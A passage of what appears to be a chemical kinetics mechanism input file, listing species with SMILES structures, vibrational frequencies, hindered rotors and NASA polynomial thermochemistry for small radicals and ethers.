NASA(polynomials=[NASAPolynomial(coeffs=[-0.319971,0.0748521,-8.40801e-06,-5.14369e-08,2.74884e-11,-16869.8,31.0514], Tmin=(100,'K'), Tmax=(959.372,'K')), NASAPolynomial(coeffs=[23.0721,0.0260737,-8.36718e-06,1.50372e-09,-1.1023e-13,-23601.7,-92.5246], Tmin=(959.372,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-141.708,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + group(Cds-CdsHH)"""), ) species( label = 'C=C=CC(C)OCC(3828)', structure = SMILES('C=C=CC(C)OCC'), E0 = (-65.5517,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0777533,0.0820083,-5.81638e-05,2.09623e-08,-3.08141e-12,-7731.24,32.02], Tmin=(100,'K'), Tmax=(1571.44,'K')), NASAPolynomial(coeffs=[17.5735,0.037078,-1.5276e-05,2.76762e-09,-1.86814e-13,-13278.8,-61.1154], Tmin=(1571.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-65.5517,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds)"""), ) species( label = 'CH2(S)(40)', structure = SMILES('[CH2]'), E0 = (418.921,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (14.0266,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = 
SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""), ) species( label = 'C=C[CH]CO[CH]C(3798)', structure = SMILES('C=C[CH]CO[CH]C'), E0 = (104.222,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,3000,3050,390,425,1340,1360,335,370,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (98.143,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.173995,0.0808482,-7.1645e-05,3.35054e-08,-6.38097e-12,12675.4,26.3274], Tmin=(100,'K'), Tmax=(1247.9,'K')), NASAPolynomial(coeffs=[15.226,0.0326005,-1.36504e-05,2.52289e-09,-1.74037e-13,8918.7,-49.6235], Tmin=(1247.9,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(104.222,'kJ/mol'), 
Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(C=CCJCO)"""), ) species( label = 'C=CC(C)[CH]O[CH]C(3829)', structure = SMILES('C=CC(C)[CH]O[CH]C'), E0 = (136.009,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3000,3050,390,425,1340,1360,335,370,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.705444,0.0978297,-9.22448e-05,4.60842e-08,-9.25128e-12,16532.3,33.7292], Tmin=(100,'K'), Tmax=(1201.05,'K')), NASAPolynomial(coeffs=[18.2013,0.0348619,-1.36034e-05,2.43249e-09,-1.65063e-13,11990.7,-60.9484], Tmin=(1201.05,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(136.009,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: 
group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(CCsJOCs)"""), ) species( label = 'C=CC1C(C)OC1C(2310)', structure = SMILES('C=CC1C(C)OC1C'), E0 = (-96.9159,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.795345,0.0502791,4.76034e-05,-1.02536e-07,4.56333e-11,-11522.1,25.4134], Tmin=(100,'K'), Tmax=(912.959,'K')), NASAPolynomial(coeffs=[17.1677,0.0312619,-7.76378e-06,1.14184e-09,-7.64101e-14,-16708.5,-64.1144], Tmin=(912.959,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-96.9159,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Oxetane)"""), ) species( label = 'CHCH3(T)(359)', structure = SMILES('[CH]C'), E0 = (343.893,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,592.414,4000],'cm^-1')), HinderedRotor(inertia=(0.00438699,'amu*angstrom^2'), symmetry=1, barrier=(26.7685,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (28.0532,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.82363,-0.000909515,3.2138e-05,-3.7348e-08,1.3309e-11,41371.4,7.10948], Tmin=(100,'K'), Tmax=(960.812,'K')), NASAPolynomial(coeffs=[4.30487,0.00943069,-3.27559e-06,5.95121e-10,-4.27307e-14,40709.1,1.84202], Tmin=(960.812,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(343.893,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), 
CpInf=(128.874,'J/(mol*K)'), label="""CHCH3(T)""", comment="""Thermo library: DFT_QCI_thermo"""), ) species( label = 'C=C[CH]C(C)[O](3162)', structure = SMILES('C=C[CH]C(C)[O]'), E0 = (134.505,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,384.942,384.942,384.943],'cm^-1')), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (84.1164,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.09655,0.0540352,-2.42723e-05,-6.88289e-09,6.2884e-12,16290.2,22.111], Tmin=(100,'K'), Tmax=(1040.9,'K')), NASAPolynomial(coeffs=[13.895,0.0243842,-9.68902e-06,1.80337e-09,-1.27382e-13,12567.8,-45.2296], Tmin=(1040.9,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(134.505,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(320.107,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(C=CCJCO)"""), ) species( label = '[CH]=C[CH2](321)', structure = SMILES('[CH]C=C'), E0 = (376.654,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,229.711,230.18,230.787],'cm^-1')), HinderedRotor(inertia=(1.33306,'amu*angstrom^2'), symmetry=1, barrier=(50.5153,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (40.0639,'amu'), energyTransferModel = 
SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.31912,0.00817959,3.34736e-05,-4.36194e-08,1.58213e-11,45331.5,10.6389], Tmin=(100,'K'), Tmax=(983.754,'K')), NASAPolynomial(coeffs=[5.36755,0.0170743,-6.35108e-06,1.1662e-09,-8.2762e-14,44095,-3.44606], Tmin=(983.754,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(376.654,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(AllylJ2_triplet)"""), ) species( label = 'C[CH]O[CH]C(3586)', structure = SMILES('C[CH]O[CH]C'), E0 = (87.5391,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3000,3050,390,425,1340,1360,335,370,309.381,309.385,309.388],'cm^-1')), HinderedRotor(inertia=(0.00176209,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.189248,'amu*angstrom^2'), symmetry=1, barrier=(12.8422,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.189124,'amu*angstrom^2'), symmetry=1, barrier=(12.8416,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.188973,'amu*angstrom^2'), symmetry=1, barrier=(12.8424,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (72.1057,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.10245,0.0618091,-6.3831e-05,3.5455e-08,-7.88959e-12,10634.5,19.5849], Tmin=(100,'K'), Tmax=(1091.38,'K')), NASAPolynomial(coeffs=[12.1588,0.0212864,-8.13614e-06,1.43372e-09,-9.63813e-14,8221.2,-34.7223], Tmin=(1091.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.5391,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + 
group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(CCsJOCs)"""), ) species( label = '[CH2][CH]C1C(C)OC1C(3830)', structure = SMILES('[CH2][CH]C1C(C)OC1C'), E0 = (174.021,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.715198,0.0578901,1.44284e-05,-5.97178e-08,2.81082e-11,21061.3,29.5339], Tmin=(100,'K'), Tmax=(925.275,'K')), NASAPolynomial(coeffs=[14.0021,0.0371761,-1.15292e-05,1.88222e-09,-1.2599e-13,17030.4,-42.0314], Tmin=(925.275,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.021,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(465.61,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Oxetane) + radical(RCCJ) + radical(Cs_S)"""), ) species( label = 'C[C]=CC(C)O[CH]C(3769)', structure = SMILES('C[C]=CC(C)O[CH]C'), E0 = (176.142,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,1685,370,3010,987.5,1337.5,450,1655,2750,2762.5,2775,2787.5,2800,2812.5,2825,2837.5,2850,1350,1380,1410,1440,1470,1500,700,750,800,1000,1050,1100,1350,1375,1400,900,1000,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), 
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0315203,0.0892071,-7.73261e-05,3.66213e-08,-7.24809e-12,21329.6,32.7109], Tmin=(100,'K'), Tmax=(1182.63,'K')), NASAPolynomial(coeffs=[13.6727,0.042855,-1.85343e-05,3.47916e-09,-2.41984e-13,18088.2,-35.7025], Tmin=(1182.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(176.142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = 'C[CH]OC(C)[C]=CC(3767)', structure = SMILES('C[CH]OC(C)[C]=CC'), E0 = (176.142,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,1685,370,3010,987.5,1337.5,450,1655,2750,2762.5,2775,2787.5,2800,2812.5,2825,2837.5,2850,1350,1380,1410,1440,1470,1500,700,750,800,1000,1050,1100,1350,1375,1400,900,1000,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, 
barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0315203,0.0892071,-7.73261e-05,3.66213e-08,-7.24809e-12,21329.6,32.7109], Tmin=(100,'K'), Tmax=(1182.63,'K')), NASAPolynomial(coeffs=[13.6727,0.042855,-1.85343e-05,3.47916e-09,-2.41984e-13,18088.2,-35.7025], Tmin=(1182.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(176.142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = '[CH2]C=[C]C(C)OCC(3831)', structure = SMILES('[CH2]C=[C]C(C)OCC'), E0 = (147.185,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,1685,370,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655,2750,2850,1437.5,1250,1305,750,350,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, 
molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.00793185,0.0829089,-6.04027e-05,2.26745e-08,-3.50278e-12,17850.5,33.4619], Tmin=(100,'K'), Tmax=(1490.7,'K')), NASAPolynomial(coeffs=[16.276,0.0392141,-1.6435e-05,3.01133e-09,-2.05112e-13,12995.6,-51.5996], Tmin=(1490.7,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(147.185,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Cds_S)"""), ) species( label = 'C[CH]O[C](C)C=CC(3764)', structure = SMILES('C[CH]C=C(C)O[CH]C'), E0 = (49.0705,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.640108,0.0891297,-6.12361e-05,1.18108e-08,2.87524e-12,6080.09,30.4291], Tmin=(100,'K'), Tmax=(1033.24,'K')), NASAPolynomial(coeffs=[20.3276,0.0315903,-1.20135e-05,2.18895e-09,-1.53071e-13,485.628,-77.5184], Tmin=(1033.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.0705,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(CCsJOC(O)) + radical(Allyl_S)"""), ) species( label = '[CH2]C(C=CC)O[CH]C(2304)', structure = SMILES('[CH2]C(C=CC)O[CH]C'), E0 = (148.81,'kJ/mol'), modes = [ 
HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3603.64,'J/mol'), sigma=(6.47245,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=562.88 K, Pc=30.16 bar (from Joback method)"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.366291,0.0974918,-9.62082e-05,5.20847e-08,-1.16087e-11,18053.8,33.1965], Tmin=(100,'K'), Tmax=(1070.7,'K')), NASAPolynomial(coeffs=[14.5818,0.0416478,-1.79736e-05,3.37249e-09,-2.3478e-13,14852.8,-39.9407], Tmin=(1070.7,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(148.81,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + 
group(Cds-CdsCsH) + radical(CCsJOCs) + radical(CJC(C)OC)"""), ) species( label = '[CH2][CH]OC(C)C=CC(3770)', structure = SMILES('[CH2][CH]OC(C)C=CC'), E0 = (149.889,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.355725,0.0922259,-8.08084e-05,3.75408e-08,-7.11925e-12,18187.2,34.0329], Tmin=(100,'K'), Tmax=(1250.86,'K')), NASAPolynomial(coeffs=[16.5784,0.0380741,-1.58711e-05,2.93153e-09,-2.02187e-13,13950.7,-51.4551], Tmin=(1250.86,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(149.889,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CJCO) + radical(CCsJOCs)"""), ) species( label = 
